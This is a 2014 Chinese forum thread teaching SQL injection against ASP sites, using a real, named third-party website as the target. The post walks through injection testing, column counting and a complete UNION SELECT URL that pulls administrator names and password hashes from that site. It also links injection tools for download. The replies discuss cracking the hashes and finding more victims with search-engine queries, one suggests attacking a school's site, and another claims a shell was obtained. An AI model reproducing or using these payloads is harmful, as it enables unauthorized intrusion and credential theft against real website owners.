已掉线,重新登录

首页 > 绿虎论坛 > 电脑 > 教程 (发帖)

标题:  【SQL注入】--简单asp注入

作者: @Ta

时间: 2014-07-30

点击: 9354

@Future 既然提到注入了 我就来讲一下

一°判断asp注入点
注入站:
http://www.yadumx.com
网址后加 and 1=1 和 and 1=2 判断,1=1时正常 1=2 时错误 说明存在注入。



二°开始注入

既然是注入了,直接开始猜字段,用 ‘order by 数字’ 来猜字段数。

说明字段数是17 一般表都会是admin 我们直接在admin表来查询


说明存在admin 我们来把字段2 和字段10 改成username 和 password 试试。


猜了好多字段都不行 怎么办呢 纠结,我们来到后台看看。



通过后台查看源码得知字段为admin_name admin_pass 然后就爆出用户和密码。



http://www.yadumx.com/news_show.asp?id=571 UNION SELECT 1,admin_name,3,4,5,6,7,8,9,admin_pass,11,12,13,14,15,16,17 from admin
当然也可以用工具,更快速。



三°结束
我用的注入工具
http://yunpan.cn/QCtunmZ8qdGTN  访问密码 ba79
分享给大家。
上面的被360屏蔽了
你们可以在这上面下载 无毒
@HWhttp://www.jb51.net/softs/41531.html

[隐藏样式|查看源码]


『回复列表(17|隐藏机器人聊天)』

1. 这个站点要遭殃了
(/@Ta/2014-07-30 12:24//)

2. @简单,谢谢啦,我试试

@1973Simona,没事什么都不会做的
(/@Ta/2014-07-30 12:26//)

3. 谷歌搜索asp?id=
(/@Ta/2014-07-30 12:33//)

4. @1973Simona,我专门挑了个md5解不开的网站 /笑
(/@Ta/2014-07-30 12:42//)

5. md5加密也登陆不了啊
(/@Ta/2014-07-30 12:49//)

6. 我一般用明小子
(/@Ta/2014-07-30 13:39//)

7. 啊d
(/@Ta/2014-07-30 14:30//)

8. @简单,xmd5查到了,但是得花钱
(/@Ta/2014-07-30 14:57//)

9. @1973Simona,一个做教程的注入站不至于拿钱去办,再找个能解出md5的注入站去入侵就好了
(/@Ta/2014-07-30 18:53//)

10. @简单,不错
(/@Ta/2014-07-30 19:08//)

11. @简单,试试我们学校的吧,网上有人能弄,http://study.sptc.sn.cn
(/@Ta/2014-07-30 19:24//)

12. @简单,注入工具不能下载,
(/@Ta/2014-07-30 19:31//)

13. PHP怎么注入?
(/@Ta/2014-07-30 22:11//)

14. get shell done.
(/@Ta/2014-07-31 10:17//)

15. @简单,md5解密后是junhunz,表示登录失败。。。。
(/@Ta/2014-08-03 10:59//)

16. @Curtion,很明显解密后不是这个 你加密看看给原md5对比 明显不一样
(/@Ta/2014-08-03 21:14//)

17. @简单,膜拜
(/@Ta/2014-08-08 22:44//)

回复需要登录

9月6日 23:29 星期六

本站由hu60wap6驱动

备案号: 京ICP备18041936号-1